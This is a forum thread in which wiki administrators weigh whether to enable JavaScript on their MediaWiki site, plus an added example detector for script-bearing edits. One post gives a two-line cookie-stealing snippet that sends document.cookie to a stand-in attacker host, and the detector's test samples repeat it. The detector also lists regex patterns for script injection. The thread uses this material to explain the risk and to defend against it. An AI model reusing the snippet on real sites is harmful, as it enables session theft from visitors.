Author Topic: Cone bottoms for JamesRL  (Read 10866 times)

Offline Keef

  • Administrator
  • Oil obsessive
  • *****
  • Posts: 552
    • Adur Cooking Oils
  • Location: Sussex

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #16 on: January 26, 2012, 12:40:42 AM »
I'm not sure page protection is the answer.  If I'm understanding the problem correctly (which is highly unlikely), we want to stop anyone but trusted editors adding code which could be malicious.

I had a little Google and came up with this page ... https://prep09geogebra.pbworks.com/w/page/18304744/Adding%20Javascript%20to%20a%20wiki%20page  I have no idea if it applies to our type of wiki, but is this the sort of thing we need?
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk

Offline Keef

  • Administrator
  • Oil obsessive
  • *****
  • Posts: 552
    • Adur Cooking Oils
  • Location: Sussex
Re: Cone bottoms for JamesRL
« Reply #17 on: January 26, 2012, 09:52:05 AM »
I'm pretty sure I don't understand it properly either but surely if you have locked the page so that it can only be edited by an administrator, how can anyone other than administrators add malicious code?

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #18 on: January 26, 2012, 10:06:03 AM »
I think we need an add on to allow JavaScript.

If that can be applied to selected pages, then your suggestion will work.  If the add on applies to the whole wiki, then it's not really in the wiki spirit to have all the pages locked.

The ideal would be for only admin (for admin, read Tony as he's the only one with the ability to do it) to be able to add the script, which, I think, is what the link I posted above is suggesting.

Wish I knew more to be able to progress things!
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk

Offline Tony

  • Administrator
  • Oil baron
  • *******
  • Posts: 5114
  • Fo' shizzle, biodizzle
    • Southampton Waste Oil Collection
  • Location: Southampton
Re: Cone bottoms for JamesRL
« Reply #19 on: January 26, 2012, 01:00:46 PM »
There are a couple of ways javascript can be turned on.

By a setting in the configuration file that enables it globally on pages.

By adding an extension like this one to include external javascript files:

http://www.mediawiki.org/wiki/Extension:WikiScript

However, both are global.  Any user making a new page would be able to add random javascript, or include a random offsite javascript file.

An example of why this is bad:

Assuming I am Mr Evil Hacker, I add the following code to any page:

i = new Image();
i.src = 'http://evilhackerssite.com/store_cookie_data?c=' + document.cookie;

Now I get to steal cookies from anyone that visits the page.

Locking individual pages with JS on does not prevent users adding it to any other page.

I had a look at the prep09geogebra plugin but that looks like it's for a specific platform or addon - certainly we don't have any plugin mechanism here.

Offline Tony

  • Administrator
  • Oil baron
  • *******
  • Posts: 5114
  • Fo' shizzle, biodizzle
    • Southampton Waste Oil Collection
  • Location: Southampton
Re: Cone bottoms for JamesRL
« Reply #20 on: January 26, 2012, 01:12:55 PM »
Also, from:

http://www.mediawiki.org/wiki/Extension:Lockdown

Quote
If you need per-page or partial page access restrictions, you are advised to install an appropriate content management package. MediaWiki was not written to provide per-page access restrictions, and almost all hacks or patches promising to add them will likely have flaws somewhere, which could lead to exposure of confidential data. We are not responsible for anything being leaked, leading to loss of funds or one's job.
For further details, see Security issues with authorization extensions

I think we're snookered.

The alternative is to switch from a wiki to a CMS, say MODx (not Joomla *shudder*), and move all 90 articles.  (CMS do allow JS extensions and restrict based on user permissions).

The disadvantage of a CMS is that I don't think it will be easy to cross link all the pages as we do in the wiki.

And of course we'd end up breaking all our external links in from offsite.

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #21 on: January 26, 2012, 01:15:36 PM »
But Tony, we're relying on you.

I had you down as a chap who could achieve anything internet related with little effort.

There'll be a lot of very upset wiki readers worldwide if you let us down.

Is there any mechanism which will flag up JavaScript as soon as it's added?  We could then delete it and ban the user.  Remember, we've already approved all members as being known to us via the VOD, other newcomers don't get editor rights.
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk
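
[Added example, not part of the original thread and not MediaWiki code: one way the "flag up JavaScript as soon as it's added" check asked about above could look when run over the raw text of each saved edit. The rule names, the trustedHosts allowlist and the sample edits are assumptions made for illustration; pattern matching like this only points a moderator at edits to review and does not make script-enabled pages safe.]

```javascript
// Added example: flag script-bearing markup in the raw text of a wiki edit.
// A review aid for spotting edits to look at; it is not an HTML sanitizer.
const RULES = [
  { id: 'script-tag',     re: /<\s*script\b[^>]*>/gi },
  { id: 'event-handler',  re: /<[^>]*\son[a-z]+\s*=/gi },
  { id: 'javascript-uri', re: /(?:=\s*["']?|\[)\s*javascript\s*:/gi },
  { id: 'cookie-access',  re: /document\s*\.\s*cookie/gi },
];
const URL_HOST = /\bhttps?:\/\/([a-z0-9.-]+)/gi;

// trustedHosts is an assumed allowlist (e.g. the wiki's own hostname).
function scanRevision(text, trustedHosts = []) {
  const findings = [];
  for (const { id, re } of RULES) {
    for (const m of text.matchAll(re)) {
      findings.push({ rule: id, index: m.index, match: m[0].trim() });
    }
  }
  // Ordinary external links are normal wiki content, so hosts are only
  // reported when the edit already contains script-like markup.
  if (findings.length > 0) {
    const trusted = new Set(trustedHosts.map((h) => h.toLowerCase()));
    for (const m of text.matchAll(URL_HOST)) {
      const host = m[1].toLowerCase();
      if (!trusted.has(host)) {
        findings.push({ rule: 'offsite-host', index: m.index, match: host });
      }
    }
  }
  return findings.sort((a, b) => a.index - b.index);
}

// Distinct rule ids hit by an edit, sorted, for a one-line moderation flag.
function rulesHit(text, trustedHosts = []) {
  return [...new Set(scanRevision(text, trustedHosts).map((f) => f.rule))].sort();
}

// Constructed sample edits; the second wraps the snippet quoted in the thread.
const SAMPLES = {
  benign: '== Cone bottoms ==\nSee [http://example.org/tanks suppliers].',
  cookieTheft: "<script>i = new Image(); i.src = 'http://evilhackerssite.com/" +
    "store_cookie_data?c=' + document.cookie;</script>",
  handler: '<img src="cone.png" onerror="run()">',
};

for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, rulesHit(text, ['wiki.example.org']));
}
```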

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #22 on: January 27, 2012, 12:06:27 AM »
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk